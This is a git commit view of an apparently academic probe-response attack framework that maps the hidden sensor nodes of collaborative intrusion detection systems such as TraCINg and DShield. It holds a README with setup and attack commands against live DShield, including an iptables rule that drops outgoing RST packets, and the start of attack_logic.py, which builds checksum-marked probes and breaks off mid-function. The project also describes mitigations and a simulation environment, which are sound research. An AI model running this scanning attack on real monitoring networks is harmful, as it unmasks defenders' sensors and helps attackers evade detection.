
initial commit

Michael Stahn 8 years ago
commit db166545f5
100 changed files with 5171 additions and 0 deletions
  1. 110 0
      README.md
  2. 0 0
      attack_framework/__init__.py
  3. 727 0
      attack_framework/attack_logic.py
  4. 143 0
      attack_framework/bugfix_socketio/parsers.py
  5. 32 0
      attack_framework/bugfix_socketio/symmetries.py
  6. 252 0
      attack_framework/group.py
  7. 373 0
      attack_framework/group_handler.py
  8. 112 0
      attack_framework/ipv4.py
  9. 206 0
      attack_framework/main_attack.py
  10. 570 0
      attack_framework/main_monitor_simulator.py
  11. 0 0
      attack_framework/pypacker/__init__.py
  12. BIN
      attack_framework/pypacker/__pycache__/__init__.cpython-33.pyc
  13. BIN
      attack_framework/pypacker/__pycache__/__init__.cpython-34.pyc
  14. BIN
      attack_framework/pypacker/__pycache__/checksum.cpython-33.pyc
  15. BIN
      attack_framework/pypacker/__pycache__/checksum.cpython-34.pyc
  16. BIN
      attack_framework/pypacker/__pycache__/pcapng.cpython-33.pyc
  17. BIN
      attack_framework/pypacker/__pycache__/ppcap.cpython-33.pyc
  18. BIN
      attack_framework/pypacker/__pycache__/ppcap.cpython-34.pyc
  19. BIN
      attack_framework/pypacker/__pycache__/psocket.cpython-33.pyc
  20. BIN
      attack_framework/pypacker/__pycache__/psocket.cpython-34.pyc
  21. BIN
      attack_framework/pypacker/__pycache__/pypacker.cpython-33.pyc
  22. BIN
      attack_framework/pypacker/__pycache__/pypacker.cpython-34.pyc
  23. BIN
      attack_framework/pypacker/__pycache__/pypacker_meta.cpython-33.pyc
  24. BIN
      attack_framework/pypacker/__pycache__/pypacker_meta.cpython-34.pyc
  25. BIN
      attack_framework/pypacker/__pycache__/triggerlist.cpython-33.pyc
  26. BIN
      attack_framework/pypacker/__pycache__/triggerlist.cpython-34.pyc
  27. 153 0
      attack_framework/pypacker/checksum.py
  28. 0 0
      attack_framework/pypacker/layer12/__init__.py
  29. BIN
      attack_framework/pypacker/layer12/__pycache__/__init__.cpython-33.pyc
  30. BIN
      attack_framework/pypacker/layer12/__pycache__/__init__.cpython-34.pyc
  31. BIN
      attack_framework/pypacker/layer12/__pycache__/arp.cpython-33.pyc
  32. BIN
      attack_framework/pypacker/layer12/__pycache__/arp.cpython-34.pyc
  33. BIN
      attack_framework/pypacker/layer12/__pycache__/dtp.cpython-33.pyc
  34. BIN
      attack_framework/pypacker/layer12/__pycache__/dtp.cpython-34.pyc
  35. BIN
      attack_framework/pypacker/layer12/__pycache__/ethernet.cpython-33.pyc
  36. BIN
      attack_framework/pypacker/layer12/__pycache__/ethernet.cpython-34.pyc
  37. BIN
      attack_framework/pypacker/layer12/__pycache__/ieee80211.cpython-33.pyc
  38. BIN
      attack_framework/pypacker/layer12/__pycache__/linuxcc.cpython-33.pyc
  39. BIN
      attack_framework/pypacker/layer12/__pycache__/llc.cpython-33.pyc
  40. BIN
      attack_framework/pypacker/layer12/__pycache__/llc.cpython-34.pyc
  41. BIN
      attack_framework/pypacker/layer12/__pycache__/ppp.cpython-33.pyc
  42. BIN
      attack_framework/pypacker/layer12/__pycache__/ppp.cpython-34.pyc
  43. BIN
      attack_framework/pypacker/layer12/__pycache__/pppoe.cpython-33.pyc
  44. BIN
      attack_framework/pypacker/layer12/__pycache__/pppoe.cpython-34.pyc
  45. BIN
      attack_framework/pypacker/layer12/__pycache__/prism.cpython-33.pyc
  46. BIN
      attack_framework/pypacker/layer12/__pycache__/radiotap.cpython-33.pyc
  47. BIN
      attack_framework/pypacker/layer12/__pycache__/stp.cpython-33.pyc
  48. BIN
      attack_framework/pypacker/layer12/__pycache__/vrrp.cpython-33.pyc
  49. 36 0
      attack_framework/pypacker/layer12/arp.py
  50. 37 0
      attack_framework/pypacker/layer12/dtp.py
  51. 189 0
      attack_framework/pypacker/layer12/ethernet.py
  52. 770 0
      attack_framework/pypacker/layer12/ieee80211.py
  53. 78 0
      attack_framework/pypacker/layer12/linuxcc.py
  54. 39 0
      attack_framework/pypacker/layer12/llc.py
  55. 44 0
      attack_framework/pypacker/layer12/ppp.py
  56. 49 0
      attack_framework/pypacker/layer12/pppoe.py
  57. 62 0
      attack_framework/pypacker/layer12/prism.py
  58. 191 0
      attack_framework/pypacker/layer12/radiotap.py
  59. 20 0
      attack_framework/pypacker/layer12/stp.py
  60. 40 0
      attack_framework/pypacker/layer12/vrrp.py
  61. 0 0
      attack_framework/pypacker/layer3/__init__.py
  62. BIN
      attack_framework/pypacker/layer3/__pycache__/__init__.cpython-33.pyc
  63. BIN
      attack_framework/pypacker/layer3/__pycache__/__init__.cpython-34.pyc
  64. BIN
      attack_framework/pypacker/layer3/__pycache__/esp.cpython-33.pyc
  65. BIN
      attack_framework/pypacker/layer3/__pycache__/esp.cpython-34.pyc
  66. BIN
      attack_framework/pypacker/layer3/__pycache__/icmp.cpython-33.pyc
  67. BIN
      attack_framework/pypacker/layer3/__pycache__/icmp.cpython-34.pyc
  68. BIN
      attack_framework/pypacker/layer3/__pycache__/icmp6.cpython-33.pyc
  69. BIN
      attack_framework/pypacker/layer3/__pycache__/icmp6.cpython-34.pyc
  70. BIN
      attack_framework/pypacker/layer3/__pycache__/igmp.cpython-33.pyc
  71. BIN
      attack_framework/pypacker/layer3/__pycache__/igmp.cpython-34.pyc
  72. BIN
      attack_framework/pypacker/layer3/__pycache__/ip.cpython-33.pyc
  73. BIN
      attack_framework/pypacker/layer3/__pycache__/ip.cpython-34.pyc
  74. BIN
      attack_framework/pypacker/layer3/__pycache__/ip6.cpython-33.pyc
  75. BIN
      attack_framework/pypacker/layer3/__pycache__/ip6.cpython-34.pyc
  76. BIN
      attack_framework/pypacker/layer3/__pycache__/ip_shared.cpython-33.pyc
  77. BIN
      attack_framework/pypacker/layer3/__pycache__/ip_shared.cpython-34.pyc
  78. BIN
      attack_framework/pypacker/layer3/__pycache__/ipx.cpython-33.pyc
  79. BIN
      attack_framework/pypacker/layer3/__pycache__/ipx.cpython-34.pyc
  80. BIN
      attack_framework/pypacker/layer3/__pycache__/ospf.cpython-33.pyc
  81. BIN
      attack_framework/pypacker/layer3/__pycache__/ospf.cpython-34.pyc
  82. BIN
      attack_framework/pypacker/layer3/__pycache__/pim.cpython-33.pyc
  83. BIN
      attack_framework/pypacker/layer3/__pycache__/pim.cpython-34.pyc
  84. 10 0
      attack_framework/pypacker/layer3/esp.py
  85. 127 0
      attack_framework/pypacker/layer3/icmp.py
  86. 84 0
      attack_framework/pypacker/layer3/icmp6.py
  87. 18 0
      attack_framework/pypacker/layer3/igmp.py
  88. 223 0
      attack_framework/pypacker/layer3/ip.py
  89. 262 0
      attack_framework/pypacker/layer3/ip6.py
  90. 141 0
      attack_framework/pypacker/layer3/ip_shared.py
  91. 16 0
      attack_framework/pypacker/layer3/ipx.py
  92. 26 0
      attack_framework/pypacker/layer3/ospf.py
  93. 31 0
      attack_framework/pypacker/layer3/pim.py
  94. 0 0
      attack_framework/pypacker/layer4/__init__.py
  95. BIN
      attack_framework/pypacker/layer4/__pycache__/__init__.cpython-33.pyc
  96. BIN
      attack_framework/pypacker/layer4/__pycache__/__init__.cpython-34.pyc
  97. BIN
      attack_framework/pypacker/layer4/__pycache__/sctp.cpython-33.pyc
  98. BIN
      attack_framework/pypacker/layer4/__pycache__/sctp.cpython-34.pyc
  99. BIN
      attack_framework/pypacker/layer4/__pycache__/ssl.cpython-33.pyc
  100. BIN
      attack_framework/pypacker/layer4/__pycache__/ssl.cpython-34.pyc

+ 110 - 0
README.md

@@ -0,0 +1,110 @@
+Probe-response attack
+=====================
+
+This project implements the probe-response attack (PRA) using the effective attack logic
+proposed by Bethencourt et al. (see "Mapping Internet Sensors With Probe Response Attacks", 2005),
+improved by two further methodologies. The first is a generic encoding scheme that uses checksums
+to filter non-probe events out of attack reports. The second is a fingerprinting approach that uses
+network-level feedback to cluster monitor nodes in the following attack iteration.
+The attack framework targets TraCINg and DShield and is extensible towards new CIDS (see Extension).
+Furthermore, this project contains a TraCINg installation extended to mitigate the threat
+originating from PRAs, and a simulation environment that allows simulating attacks on TraCINg.
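+
+For example, with 24 marker value bits and an 8-bit checksum (the defaults, configurable via
+markerbits_value/markerbits_checksum in attack_framework/attack_logic.py), a probe carries
+marker = (value << 8) | checksum(value); report entries whose recomputed checksum does not
+match their marker value are discarded as non-probe noise.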
+
+This project is made of the following parts:
+
+* Probe-response attack framework (see ./attack_framework)
+* TraCINg, extended with Probe-Response attack mitigations (see ./tracing)
+* Probe-Response attack simulation environment (see ./attack_framework)
+
+## Requirements and installation ##
+* The attack framework and the simulation environment use raw sockets, which requires root privileges.
+* Commands are assumed to be called from the base directory of the project.
+* Do NOT use virtual interfaces that do not provide a data link layer -> ZMap (pcap in particular) needs interfaces with data link access
+
+### Linux based OS ###
+* On Ubuntu the following command installs all required packages. Depending on the OS version, some package versions may deviate.
+    : apt-get install libgmp3-dev libjson-c-dev libffi-dev npm nodejs-legacy gcc gengetopt byacc libpcap-dev mongodb flex cmake build-essential python-dev python3-dev python3-pip python-virtualenv arping
+
+* The following should be installed for 32-bit compatibility.
+    : apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 libpcap0.8:i386 libcap-1*
+* For simulations the Linux kernel module dummy has to be present (available by default on Ubuntu)
+* Configure Linux to allow more memory usage for network purposes. Add the following to /etc/sysctl.conf:
+
+    : net.core.rmem_default   = 268435456
+    : net.core.wmem_max       = 2147483647
+    : net.core.wmem_default   = 268435456
+    : net.core.netdev_max_backlog = 10000000
+    : Apply the settings with: sysctl -p
+
+* Disable sending RST to minimize traffic
+    : iptables -A OUTPUT -p tcp -m tcp --tcp-flags RST,RST RST,RST -j DROP
+    : **Undo of the previous command:**
+    : iptables -D OUTPUT -p tcp -m tcp --tcp-flags RST,RST RST,RST -j DROP
+
+### Python 3.x ###
+* Install and start virtualenv
+    : virtualenv -p /usr/bin/python3.4 /root/.virtualenv
+    : source /root/.virtualenv/bin/activate
+* Install Python modules
+    : pip install -r attack_framework/requirements.txt
+* Warning: socketio_client needs a bug fix because of wrongly handled encodings (TraCINg sometimes uses non-UTF-8 encodings, which crashes the library)
+    : cp attack_framework/bugfix_socketio/* /root/.virtualenv/lib/python3.4/site-packages/socketIO_client/
+
+
+### ZMap ###
+* The ZMap extension is based on version v2.1.0-RC1
+    : cd zmap
+    : rm CMakeCache.txt
+    : ./build_zmap.sh
+    : ./update_ip_blacklist.sh
+    : cd ..
+
+### Node.js ###
+* This is a bugfixed version of TraCINg (allowing ports 0 and 65535 in modules/postHandler.js)
+    : cd tracing
+    : rm -rf node_modules
+    : npm install
+    : npm install chance collections event-stream fs
+    : cd ..
+
+* Problems with MongoDB:
+    : The latency of MongoDB is too high under heavy traffic, which is why
+data insertion is commented out in postHandler.js (it is not needed)
+
+## Usage ##
+### General initiation ###
+* Create the virtual interface and initiate the virtual environment (again: run as root because of raw sockets). This assumes the virtualenv is placed at /root/.virtualenv
+    : . ./setup_evironment.sh startinterface
+
+### Starting TraCINg ###
+* cd tracing
+* node --max-new-space-size=4096 --max-old-space-size=2048 index.js
+
+### Starting attack ###
+* The attack framework has to be configured for the target system
+* TraCINg
+    : Set the correct tracing_domain in TracingReportFetcher (or create a dedicated report fetcher)
+* DShield
+    : marker value bits=32, marker checksum bits=0 (when doing IP filtering)
+    : use_source_ip_filter in report_fetcher.py
+    : sleeptime in DShieldReportFetcher constructor
+    : **optional: adjust parameters in main_attack.py:**
+	    : ip_stage1 (main_attack.py)
+	    : cidr_bits_stage1 (main_attack.py)
+	    : cores (scanner_wrapper.py)
+* Get gateway MAC via: arping [ip_gateway]
+* Some example calls:
+    : python main_attack.py --help
+    : python main_attack.py -i eth10 -m [mac_gateway] -r 10000 -b 32 -c 0
+
+### Starting Simulation ###
+* Perform the general initiation (see above)
+* Adjust the TraCINg domain in TracingReportFetcher to localhost
+* Start TraCINg (see above)
+* cd attack_framework && python main_monitor_simulator.py -m 1000 [further arguments]
+* Start the attack (see above)
+
+## Extension ##
+The attack framework can be extended to new CIDS by subclassing ReportFetcher in report_fetcher.py
+and implementing before_scanning() and after_scanning(). The new class has to be placed
+in the same module. The new report fetcher can then be chosen by its class name when starting
+the attack framework via the parameter report_fetcher_classname, as sketched below.
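+
+A minimal sketch of such an extension (the hook bodies are assumptions; only the subclassing
+mechanism and the two hook names are prescribed above):
+    : # in report_fetcher.py (same module as ReportFetcher)
+    : class MyCidsReportFetcher(ReportFetcher):
+    :     def before_scanning(self):
+    :         # e.g. remember the newest report entry so only fresh entries are read later
+    :         pass
+    :     def after_scanning(self):
+    :         # e.g. fetch new reports and pass each response to the framework
+    :         pass
+
+The flag spelling below is an assumption (check python main_attack.py --help):
+    : python main_attack.py --report_fetcher_classname MyCidsReportFetcher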

+ 0 - 0
attack_framework/__init__.py


+ 727 - 0
attack_framework/attack_logic.py

@@ -0,0 +1,727 @@
+import os
+import logging
+import threading
+import re
+import pickle
+import os.path
+import time
+import math
+import struct
+import queue
+from multiprocessing import Process, SimpleQueue
+
+from group import Group
+import scanner_wrapper
+import group_handler
+
+import ipv4
+from utility import ip_str_to_bytes
+from pypacker.checksum import fletcher32
+from pypacker.psocket import SocketHndl
+from pypacker.layer12 import ethernet
+from pypacker.layer3 import ip
+from pypacker.layer4 import tcp
+
+split_equal = re.compile("=+").split
+split_space = re.compile(" +").split
+split_tab = re.compile("\t").split
+split_comma = re.compile(",").split
+split_slash = re.compile("/").split
+
+unpack_port = struct.Struct(">H").unpack
+pack_checksum = struct.Struct(">I").pack
+pack_port = struct.Struct(">H").pack
+pack_marker = struct.Struct(">Q").pack
+pack_byte = struct.Struct(">B").pack
+pack_markervalue = struct.Struct(">I").pack
+unpack_marker = struct.Struct(">Q").unpack
+unpack_markervalue = struct.Struct(">Q").unpack
+
+IPv4Address = ipv4.IPv4Address
+IPv4Network = ipv4.IPv4Network
+
+ENCODE_PORT_DST = 1
+ENCODE_IP_SRC = 2
+ENCODE_PORT_SRC = 4
+
+logger = logging.getLogger("pra_framework")
+
+
+class ProbeResponseAttackLogic(object):
+	"""
+	Implementation of the probe-response attack using a dedicated scanner for probing.
+	Workflow:
+	>> Stage 1:
+	- Send probes without creating initial groups (saves state information) -> create Groups WHILE scanning
+	- Get result and add Groups to _iterations[index_iteration]
+	- Create groups: Check scanner feedback and re-group per sub-group based on it
+
+	>> Stage 2:
+	- Create groups before scanning (first time: after stage 1/iteration 1)
+	- Set amount of subgroups based on amount of responses
+	- Continue scanning until no groups are left
+	The destination address can be encoded into different parts of markers like
+	source IP address, source port, destination port etc.
+
+	Pre-filtering of noisy values:
+	- Noisy marker values do not get pre-filtered as this problem can be effectively
+	mitigated using a trade off between marker/checksum-bits.
+
+	Detection mitigation:
+	- Avoiding low-noise markers to evade detection does not seem to be necessary,
+	as low-noise markers like destination ports would appear with a low frequency
+	-> sending 65535 (dst port) * (other marker) values will appear approximately
+	"amount of sensors" * y times for every attack iteration, which is likely to be a
+	low number for a specific port "p" and hence hard to detect as a statistical anomaly.
+	"""
+
+	PROP_DEFAULTS = {
+		# network options
+		"interface_name": "eth0",
+		"mac_source": None,
+		"mac_gw": None,
+		# source IP, mainly intended for native probes
+		"ip_src": "1.1.1.1",
+		"rate_kbit_per_s": 1000,
+		# marker options
+		"marker_encoding": 0,
+		"markerbits_value": 24,
+		"markerbits_checksum": 8,
+		# directory to save all data related to an attack cycle (trailing slash)
+		"base_dir_save": "./",
+		# directory which contains "src/zmap"
+		"base_dir_zmap": "../zmap",
+		"disable_monitor": 1,
+		"verbosity": 3,
+		"report_fetcher_classname": "TracingReportFetcher",
+		# state info. Should only be changed by internal logic.
+		# stage 1 or 2 (initial 0)
+		#"_stage": 0,
+		# index into _iterations where the most recent groups get stored
+		"_group_storeindex": 0,
+		"use_feedback_ips": False,
+		"use_plus1": False,
+		# TODO: change for testing
+		"is_simulation": False,
+		# debugging options
+		# avoid scanning the whole network -> limit to a subnet (default is: scan whole IPv4 - blacklist)
+		"_ip_stage1": "0.0.0.0",
+		"_cidr_bits_stage1": 0
+	}
+
+
+	def __init__(self, **kwargs):
+		# set default values, will be overwritten by config variables
+		# parameter hierarchy: default -> constructor
+		for prop, default in ProbeResponseAttackLogic.PROP_DEFAULTS.items():
+			setattr(self, prop, kwargs.get(prop, default))
+			logger.debug("config: %s = %s" % (prop, kwargs.get(prop, default)))
+
+		self._running = False
+		# current scan processes
+		self._current_scans = []
+
+		# Files
+		self._filename_state_groups = os.path.join(self.base_dir_save, "state_groups.bin")
+		# contains information like: ip -> response type
+		self._filename_scannerresponse_stage1 = os.path.join(self.base_dir_save, "scanner_response.csv")
+		if self.is_simulation:
+			self._filename_ip_blacklist = os.path.join(self.base_dir_zmap, "blacklist.conf_simulation")
+			self._filename_ip_whitelist = None
+		else:
+			self._filename_ip_blacklist = os.path.join(self.base_dir_zmap, "blacklist.conf")
+			#self._filename_ip_whitelist = os.path.join(self.base_dir_zmap, "whitelist.conf")
+			self._filename_ip_whitelist = None
+
+		self._filename_ip_blacklist_plus_feedback_ips = os.path.join(self.base_dir_save, "blacklist_plus_feedback_addr.conf")
+		self._filename_full_report = os.path.join(self.base_dir_save, "report_fetcher_responses.csv")
+		self._filename_identified_monitors = os.path.join(self.base_dir_save, "identified_monitors.csv")
+		self._dirname_scanner_logs = self.base_dir_save
+
+		self.set_report_fetcher_class(self.report_fetcher_classname)
+		self._report_fetcher = None
+
+		self.attack_thread = None
+		self.marker_bits_total = self.markerbits_value + self.markerbits_checksum
+		self.marker_bytes_total = math.ceil((self.markerbits_value + self.markerbits_checksum)/8)
+		# amount of bits to shift the marker value left to pad it to 4 bytes
+		# bits=9: 0000 0000 0000 0000 0000 0001 1111 1111 -> left shift=23 -> 1111 1111 1000 0000....
+		self.marker_value_leftshift = 32 - self.markerbits_value
+		self.marker_value_bytes_amount = math.ceil(self.markerbits_value/8)
+		self.marker_value_amount = 2 ** self.markerbits_value
+		# By using +1 groups we save/gain an additional "amount of new subgroups" marker values
+		logger.debug("total amount of marker VALUES: %d (plus1: %r)" % (self.marker_value_amount, self.use_plus1))
+		logger.debug("initial scan: %r/%r" % (self._ip_stage1, self._cidr_bits_stage1))
+		# Example: 5 marker values: floor(log2(5)) = 2 -> 2 bits = 4 subgroups
+		self.cidr_bits_stage1 = math.floor(math.log(self.marker_value_amount, 2))
+		self.marker_checksum_bytes_amount = math.ceil(self.markerbits_checksum / 8)
+
+		# Groups which got/get scanned.
+		# [[start, stop], {marker: Group}, total groups, total addresses]
+		self._iterations = []
+		self._iterations.append([[0, 0], {}, 0, 0])
+		initial_group = Group(ip_network_object=IPv4Network(nw_ip_str=self._ip_stage1,
+															prefixlen=self._cidr_bits_stage1),
+							response_count=0)
+		self._root_group_name = b"ROOT_GROUP_PRA"
+		self._iterations[0][1][self._root_group_name] = initial_group
+		addresses_root = 2 ** (32 - self._cidr_bits_stage1)
+		self._iterations[0][2] = min(self.marker_value_amount, addresses_root)
+		self._iterations[0][3] = addresses_root
+		self._group_storeindex = 0
+
+		"""
+		if self.markerbits_value % 8 != 0 or self.markerbits_checksum % 8 !=0:
+			logger.warning("markerbits not multiple of 8, value/checksum = %r/%r" %
+							(self.markerbits_value, self.markerbits_checksum))
+		"""
+		# native prober
+		# TODO: adjust this on other platforms
+		self._native_prober_amount = 5
+		self._native_prober_sockets = []
+		self._native_prober_conn_send = []
+		self._native_prober_processes = []
+		self._native_prober_conn_send_index = 0
+		self._groupqueue = SimpleQueue()
+		self._blacklist = set()
+		# { top group marker value -> set(feedback_address1, feedback_address2, ...)}
+		self._blacklist_toptoipv4obj = {}
+		self._grouphandler = group_handler.GroupHandler(self.marker_value_amount,
+														self.use_plus1,
+														self._create_marker_bitlevel)
+		self._initial_count = 0
+
+	def set_report_fetcher_class(self, classname):
+		if self._running:
+			return
+		# get report fetcher by classname
+		fetcher_module = __import__("report_fetcher")
+
+		try:
+			logger.debug("setting report fetcher class: %s" % classname)
+			self._reportfetcher_class = getattr(fetcher_module, classname)
+		except AttributeError:
+			raise Exception("could not load report fetcher class! Is it implemented in report_fetcher.py?")
+
+	def _report_values_to_marker(self, ip_source, port_src, port_dst):
+		"""
+		Combines all markers given by a report in the correct order. Unused parts are left out.
+		return -- markervalue (int), markerchecksum (int), marker (bytes)
+		"""
+		bts = []
+		if self.marker_encoding & ENCODE_PORT_DST == ENCODE_PORT_DST:
+			bts.append(pack_port(port_dst))
+		if self.marker_encoding & ENCODE_IP_SRC == ENCODE_IP_SRC:
+			bts.append(ip_str_to_bytes(ip_source))
+		if self.marker_encoding & ENCODE_PORT_SRC == ENCODE_PORT_SRC:
+			bts.append(pack_port(port_src))
+		bts = b"".join(bts)
+		#logger.debug("decoding: %s" % bts)
+		markervalue_and_checksum = int.from_bytes(bts, "big")
+		#logger.debug("report full marker: %s=%d" % (bts, markervalue_and_checksum))
+		# marker value: b"AAAA AAAA AAAA AABB" -> b"00AA AAAA AAAA AAAA"
+		# marker checksum: b"AAAA AAAA AAAA AABB" -> b"0000 0000 0000 00BB"
+		marker_length = self.marker_bits_total
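+		# Worked example (illustrative values, assuming markerbits_value=24,
+		# markerbits_checksum=8 and marker_encoding == ENCODE_IP_SRC):
+		# ip_source="1.2.58.171" packs to b"\x01\x02\x3a\xab" = 0x01023AAB
+		# -> marker value    = 0x01023AAB >> (32 - 24)  = 0x01023A
+		# -> marker checksum = 0x01023AAB & 0xFF        = 0xAB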
+		return (markervalue_and_checksum >> (marker_length - self.markerbits_value)),\
+				markervalue_and_checksum & (0xFFFFFFFFFFFFFFFF >> (64 - self.markerbits_checksum)),\
+				bts
+
+	def _create_checksum_bitlevel(self, markervalue):
+		"""
+		Create a checksum using value markervalue
+		markervalue -- integer to create checksum from (non padded)
+		return -- checksum as integer
+		"""
+		marker_value_leftshifted = markervalue << self.marker_value_leftshift
+		marker_value_bytes_forchecksum = pack_markervalue(marker_value_leftshifted)
+		#logger.debug("padded marker value before checksum: %s" % marker_padded)
+		#return pack_checksum(fletcher32(marker_padded, len(marker_padded)/2)), marker_padded
+		#checksum_int = fletcher32(marker_value_bytes_forchecksum, len(marker_value_bytes_forchecksum)/2) & 0xFFFFFFFF
+		return fletcher32(marker_value_bytes_forchecksum, 2) >> (32 - self.markerbits_checksum)
+
+	def _create_marker_bitlevel(self, marker_value_int_to_encode):
+		"""
+		Create a new marker like [marker][checksum] from the given value_int.
+		marker value:
+		291 -> b"00000123" (hex) -> b"000123" (marker value: eg 3 bytes)
+		-> chk = checksum(b"000123"	-> b"00012300") = b"abcdefgh"
+		-> b"000123" (marker value) + b"abcdefgh"[:checksum_len] (marker checksum)
+		Resulting marker (3 value bytes, 2 checksum bytes): b"000123abcdefgh" -> b"000123abcd"
+
+		WARNING: this assumes self.marker_bits_total % 8 == 0 is True (otherwise shift resulting marker to the left)
+		"""
+		checksum_int = self._create_checksum_bitlevel(marker_value_int_to_encode)
+		# take marker value from left, cut off marker bits from right
+		marker_int = (marker_value_int_to_encode << self.markerbits_checksum) | checksum_int
+		#logger.debug("new marker value orig/marker value for checksum/checksum is = %s/%s/%s" %
+		#			 (marker_value, marker_value_padded, marker_checksum))
+		# INFO: if self.marker_bits_total is not divisible by 8 without rest: shift self.marker_bits_total % 8 to right
+		return pack_marker(marker_int)[-self.marker_bytes_total:]
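+		# Worked example (illustrative values, assuming markerbits_value=24 and
+		# markerbits_checksum=8, i.e. marker_bytes_total=4):
+		#   marker_value_int_to_encode = 0x000123
+		#   checksum input  = 0x000123 << 8 = 0x00012300, packed as 4 bytes
+		#   checksum_int    = fletcher32(...) >> 24, e.g. 0xAB (top 8 checksum bits)
+		#   marker_int      = (0x000123 << 8) | 0xAB = 0x000123AB
+		#   returned marker = last 4 bytes of pack(">Q", marker_int) = b"\x00\x01\x23\xab"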
+
+	def _read_scanner_feedback_addresses(self):
+		"""
+		Read scanner feedback addresses gathered from stage 1. Additionally this updates
+		_filename_ip_blacklist_plus_feedback_ips to contain all blacklisted IPs (including feedback ones).
+		"""
+		if not os.path.exists(self._filename_scannerresponse_stage1):
+			logger.warning("could not find response file at: %s" % self._filename_scannerresponse_stage1)
+			return []
+		logger.debug("reading feedback file")
+		fd = open(self._filename_scannerresponse_stage1, "r")
+		# skip header
+		fd.readline()
+		# File format of feedback file:
+		# classification,saddr,daddr,daddr_inner_icmp,sport,dport,success
+		# rst,1.0.0.0,1.1.1.1,(None),256,2,0
+		# synack,1.0.0.1,1.1.1.1,(None),256,2,1
+		self._blacklist.clear()
+		self._blacklist_toptoipv4obj.clear()
+		groups_stage1 = self._iterations[1][1]
+		# found IP -> remove trailing/unused bits: (found IP) >> (IPv4 length - (marker value bits))
+		bits_shift_ip = 32 - self.markerbits_value
+
+		for line in fd:
+			columns = split_comma(line)
+			if len(columns) < 4:
+				logger.warning("not enough columns in CSV file: %r" % columns)
+				continue
+			# CSV format: type,ip src (attack target), ip dst,ip extern (our extern ip),...
+			responsetype = columns[0]
+
+			# assume everything other than ICMP is a potential monitor node;
+			# ICMP unreachable is assumed to indicate no monitor node
+			if not responsetype.startswith("icmp"):
+				address = columns[1]
+			else:
+				continue
+			try:
+				# convert the IP to a marker value and check whether it belongs to a found group
+				# this is MUCH faster than checking every single group
+				address_obj = IPv4Address(ip_str=address)
+				# 1.2.3.4 -> 1.2 = marker value
+				top_group_markervalue = address_obj.ip_int >> bits_shift_ip
+
+				if top_group_markervalue not in groups_stage1:
+					#logger.derbug("skipping IP not belonging in initial groups: %r" % address_obj)
+					continue
+			except Exception as ex:
+				logger.warning("invalid IPv4 address in feedback file: %r" % address)
+				print(ex)
+				continue
+
+			# this is a bit redundant but doesn't hurt
+			if address_obj.packed not in self._blacklist:
+				self._blacklist.add(address_obj.packed)
+			else:
+				# already saved
+				# skip adding the address to the _blacklist_toptoipv4obj list
+				continue
+
+			try:
+				self._blacklist_toptoipv4obj[top_group_markervalue].append(address_obj)
+			except KeyError:
+				self._blacklist_toptoipv4obj[top_group_markervalue] = [address_obj]
+
+		fd.close()
+		logger.debug("amount feedback addresses: %d" % len(self._blacklist))
+
+		# update extended blacklist file
+		logger.debug("updating extended blacklist file")
+		fd_read = open(self._filename_ip_blacklist, "r")
+		blacklist_standard = fd_read.read()
+		fd_read.close()
+		fd_write = open(self._filename_ip_blacklist_plus_feedback_ips, "w")
+		fd_write.write(blacklist_standard)
+
+		for top_group_markervalue, addresses in self._blacklist_toptoipv4obj.items():
+			for addr in addresses:
+				fd_write.write("%s/32\n" % addr.compressed)
+		fd_write.close()
+
+	def _addentry_callback(self, ip_source, port_src, port_dst):
+		"""
+		Callback called by the report fetcher if a new response was found.
+		ip_source -- IPv4 address as string
+		port_src -- source port as int
+		port_dst -- destination port as int
+		"""
+		marker_value_report_int, marker_checksum_report_int, marker_report = self._report_values_to_marker(ip_source,
+																											port_src,
+																											port_dst)
+		#logger.debug("from report: marker value=%d, checksum=%d, full marker=%s" %
+		#  (marker_value_report_int, marker_checksum_report_int, marker_report))
+		marker_checksum_gen = self._create_checksum_bitlevel(marker_value_report_int)
+		#logger.debug("comparing checksum: new/report = %s/%s" % (checksum_gen, marker_checksum_report))
+
+		# compare via startswith: checksum could only be partially encoded
+		# skip values having invalid checksums, ignore if no checksum is used
+		if marker_checksum_report_int != marker_checksum_gen and self.markerbits_checksum != 0:
+			#logger.debug("checksum didn't match (YOLO): %r!=%r" % (
+			#			  marker_checksum_report_int, marker_checksum_gen))
+			return
+		# logger.debug("checksum matched!!!")
+
+		if self._group_storeindex == 1:
+			group_dict_current = self._iterations[1][1]
+
+			if marker_value_report_int in group_dict_current:
+				group_dict_current[marker_value_report_int].response_count += 1
+				"""
+				logger.debug("incremented response count: group=%r, count=%d" %
+						(group_dict_current[marker_report], group_dict_current[marker_report].response_count))
+				"""
+			else:
+				# create initial entries
+				# marker value is actually (part of) our IP address in the first stage
+				ip_int = marker_value_report_int << (32 - self.markerbits_value)
+
+				try:
+					ip_network = IPv4Network(nw_ip_int=ip_int, prefixlen=self.cidr_bits_stage1)
+					newgroup = Group(ip_network_object=ip_network, response_count=1)
+
+					"""
+					self._initial_count += 1
+					if self._initial_count % 100 == 0:
+						logger.debug("%d: creating initial group based on report response: marker=%s, group=%r" %
+								(self._initial_count, marker_report, newgroup))
+					"""
+					self._iterations[0][1][self._root_group_name].add_subgroup(newgroup)
+					group_dict_current[marker_value_report_int] = newgroup
+				except Exception as ex:
+					logger.warning("could not create initial group (first stage), correct checksum but wrong network? ip=%r" % ip_int)
+					print(ex)
+		else:
+			group_dict_current = self._iterations[self._group_storeindex][1]
+			# add entries for iteration >= 2
+			try:
+				# the group should have been created by now
+				# this can additionally filter out noise as groups are created incrementally
+				subgroup = group_dict_current[marker_value_report_int]
+				#if random.random() > 0.5:
+				#	logger.debug("marker value=%d" % marker_value_report_int)
+				subgroup.response_count += 1
+
+				# add the subgroup to its top group if not yet known;
+				# subgroups that are not connected get deleted at the end of each iteration
+				# (response_count == 1 means the subgroup was not yet added, so do it now)
+				if subgroup.response_count == 1:
+					subgroup.top_group.add_subgroup(subgroup)
+			except KeyError:
+				"""
+				logger.warning("checksum correct but marker value %r not found for response (total: %d), "
+								"marker=%r -> not counting" % (
+								marker_value_report_int, len(group_dict_current), marker_report))
+				"""
+				#logger.warning("ip=%r, port src=%r, port dst=%r" % (ip_source, port_src, port_dst))
+				pass
+
+	def _save_state(self):
+		"""
+		Save the current group state using python pickle format.
+		"""
+		logger.debug("saving state to: %s" % self._filename_state_groups)
+		fd_state = open(self._filename_state_groups, "wb")
+		pickle.dump(self._iterations, fd_state)
+		fd_state.close()
+		logger.debug("finished saving state")
+
+	def start(self):
+		"""
+		Starts the PRA attack.
+		"""
+		if self._running:
+			logger.debug("can not start: attack is already running")
+			return
+		# init report fetcher
+		self._report_fetcher = self._reportfetcher_class(self._addentry_callback,
